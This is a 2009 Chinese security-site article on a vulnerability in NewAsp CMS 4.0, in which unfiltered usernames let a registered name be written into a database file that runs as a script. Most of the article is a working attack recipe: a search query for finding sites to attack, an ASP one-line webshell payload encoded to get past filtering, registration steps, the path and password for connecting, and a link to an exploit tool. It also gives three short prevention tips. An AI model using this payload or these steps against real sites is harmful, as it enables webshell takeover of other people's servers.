ARP联盟图文中心下载中心手机频道最近更新软件最近更新文章网络热点
您当前的位置→图文中心安全防范新云网站系统NewAsp CMS Version 4.0最新0day
站内搜索:

新云网站系统NewAsp CMS Version 4.0最新0day


2009/10/11  编辑:admin 来源:本站整理 

概述:
          由于新云4.0对注册用户未过滤特殊字符,造成黑客通过脚本编码转换将一句话木马写入数据库文件,从而获得WEBSHELL权限。


测试:

   1. 打开www.google.cn   搜索关键字:Powered By NewAsp CMS Version 4.0 或 新云问吧
   
   2. 将<%execute request("a")%> 编码转换为 ┼攠數畣整爠煥敵瑳∨≡┩愾
  
   3. 以┼攠數畣整爠煥敵瑳∨≡┩愾   为用户名注册帐户

   4. 用一句话连接端连接 目标站点url/ask/data/ask_newasp.asa ,密码为 a

   5.上传脚本大马或者执行其它操作,这里WEBSHELL权限已经获得。

预防:

    1.严格过滤注册用户名,限制注册用户名长度及禁止特殊符号。
    2.更改ask/data/ask_newasp.asa 路径及名称。
    3.给文件夹做权限设置,去除公共写入权限。

附工具:

新云最新Oday利用工具 1010

参考消息:http://www.arpun.com/下载地址:http://www.arpun.com/soft/3392.html

更多精彩,请查看本类栏目: 安全防范
除非注明,ARP联盟文章来于网络,投稿原创等,转载请以链接形式标明本文地址。
本文地址:http://www.arpun.com/article/4520.html

相关文章
  • ·新云内容关键字管理BUG
  • ·解决新云系统国外空间生成HTML空白问题
  • ·新云3系列伪静态完美规则
  • ·新云网站系统NewAsp CMS Version 4.0最新0day
  • ·新云4.0 0DAY+2种利用方法
  • ·新云4.0如何让发表文章评论的窗口默认展开
  • ·新云SEO优化要点
  • ·新云网站管理系统安装与调试
  • 发表评论
    栏目列表
    阅读排行
    本类最新
    网站帮助 - 广告合作 - 下载声明 - 网站地图